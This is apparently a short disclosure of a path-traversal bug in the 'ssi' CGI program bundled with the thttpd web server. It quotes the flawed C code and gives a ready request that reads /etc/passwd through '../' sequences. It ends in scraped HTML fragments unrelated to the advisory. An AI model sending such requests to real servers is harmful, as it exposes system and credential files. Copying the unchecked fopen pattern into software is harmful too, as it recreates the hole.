ssi ( server sides include ) is a cgi proggie that comes by default
with thttpd web server, I am not sure about others.
ssi has a nasty bug with regards to the PATH_TRANSLATED env var.
As you can see the contents of PATH_TRANSLATED get copied into path_translated
which get's fopen()'ed later.
It does no checking on the path_translated string. After it opens the file
it runs the read_file() function which returns the contents of fp.
So as you can plainly see we can view any file on the system.
try
GET /cgi-bin/ssi//../../../../../../../../../etc/passwd
this would yield the passwd file.
path_translated = getenv( "PATH_TRANSLATED" );
if ( path_translated == (char*) 0 )
{
internal_error( "Couldn't get PATH_TRANSLATED environment variable." );
exit( 1 );
}
/* Open it. */
fp = fopen( path_translated, "r" );
read_file( path_info, path_translated, fp );
|
|
|
|
<![CDATA[<p id="vvttv"></p>]]>
|
|
<![CDATA[<p id="vvttv"></p>]]> |
<![CDATA[<p id="vvttv"></p>]]>
<![CDATA[<pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>]]>
|
<![CDATA[<output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>]]>
<![CDATA[<p id="vvttv"></p>]]> |